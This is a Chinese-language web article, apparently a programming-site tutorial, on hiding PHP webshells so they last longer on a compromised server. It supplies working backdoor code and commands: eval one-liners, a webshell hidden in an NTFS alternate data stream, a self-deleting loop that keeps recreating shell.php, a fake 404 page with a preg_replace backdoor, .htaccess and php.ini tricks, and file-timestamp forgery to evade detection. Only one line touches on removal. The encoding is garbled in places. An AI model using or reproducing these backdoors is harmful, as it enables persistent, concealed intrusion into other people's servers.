前言
如果想讓自己的Webshell留的更久一些�����,除了Webshell要免殺,還需要注意一些隱藏技巧�,比如隱藏文件,修改時間屬性���,隱藏文件內(nèi)容等�����。
1�����、隱藏文件
使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統(tǒng)文件屬性、存檔文件屬性��、只讀文件屬性和隱藏文件屬性��。
attrib +s +a +h +r shell.php //隱藏shell.php文件
2�����、修改文件時間屬性
當(dāng)你試圖在一堆文件中隱藏自己新創(chuàng)建的文件���,那么��,除了創(chuàng)建一個迷惑性的文件名���,還需要修改文件的修改日期�����。
//修改時間修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//訪問時間修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//創(chuàng)建時間修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
使用命令獲取文件屬性
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
修改某個文件夾下所有文件的創(chuàng)建和修改時間
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3�、利用ADS隱藏文件內(nèi)容
在服務(wù)器上echo一個數(shù)據(jù)流文件進去���,比如index.php是網(wǎng)頁正常文件����,我們可以這樣子搞:
echo ^?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
這樣子就生成了一個不可見的shell hidden.jpg����,常規(guī)的文件管理器、type命令���,dir命令�����、del命令發(fā)現(xiàn)都找不出那個hidden.jpg的��。
利用include函數(shù)����,將index.php:hidden.jpg進行hex編碼,把這個ADS文件include進去�����,這樣子就可以正常解析我們的一句話了���。
?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4�����、不死馬
不死馬會刪除自身�����,以進程的形式循環(huán)創(chuàng)建隱蔽的后門。
?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); //刪除自身
while(1)
{
file_put_contents('shell.php','?php @eval($_GET[cmd]);?>'); //創(chuàng)建shell.php����,這里最好用免殺的一句話
sleep(10); //間隔時間
}
?>
處理方式最簡單有效的辦法��,就是重啟服務(wù)就可以刪除webshell文件。
5�、中間件后門
將編譯好的so文件復(fù)制到modules文件夾�����,啟動后門模塊���,重啟Apache�����。當(dāng)發(fā)送特定參數(shù)的字符串過去時��,即可觸發(fā)后門����。
github項目地址:
https://github.com/VladRico/apache2_BackdoorMod
6�、利用404頁面隱藏后門
404頁面主要用來提升用戶體驗,可用來隱藏后門文件�����。
!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
html>head>
title>404 Not Found/title>
/head>body>
h1>Not Found/h1>
p>The requested URL was not found on this server./p>
/body>/html>
?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
7、利用 .htaccess 文件構(gòu)成PHP后門
一般.htaccess可以用來留后門和針對黑名單繞過����,在上傳目錄創(chuàng)建.htaccess 文件寫入,無需重啟即可生效�����,上傳png文件解析���。
AddType application/x-httpd-php .png
另外��,在.htaccess 加入php解析規(guī)則���,把文件名包含1的解析成php�����,上傳1.txt即可解析�。
FilesMatch "1">
SetHandler application/x-httpd-php
/FilesMatch>
8�、利用 php.ini 隱藏后門文件
php.ini 中可以指定在主文件執(zhí)行前后自動解析的文件名稱���,常用于頁面公共頭部和尾部�,也可以用來隱藏php后門����。
;在PHP文檔之前自動添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文檔之后自動添加文件�����。
auto_prepend_file = "c:\tmp.txt"
需重啟服務(wù)生效,訪問任意一個php文件即可獲取webshell。
總結(jié)
到此這篇關(guān)于PHP后門隱藏的一些技巧的文章就介紹到這了,更多相關(guān)PHP后門隱藏技巧內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
您可能感興趣的文章:- 分享五個PHP7性能優(yōu)化提升技巧
- php提高腳本性能的4個技巧
- php把文件設(shè)置為插件的技巧方法
- PHP學(xué)習(xí)的技巧和學(xué)習(xí)的要素總結(jié)
- PHP實用小技巧之調(diào)用錄像的方法
- php探針使用原理和技巧講解
- php和vue配合使用技巧和方法
- php技巧小結(jié)【推薦】
- 淺談PHP7中的一些小技巧
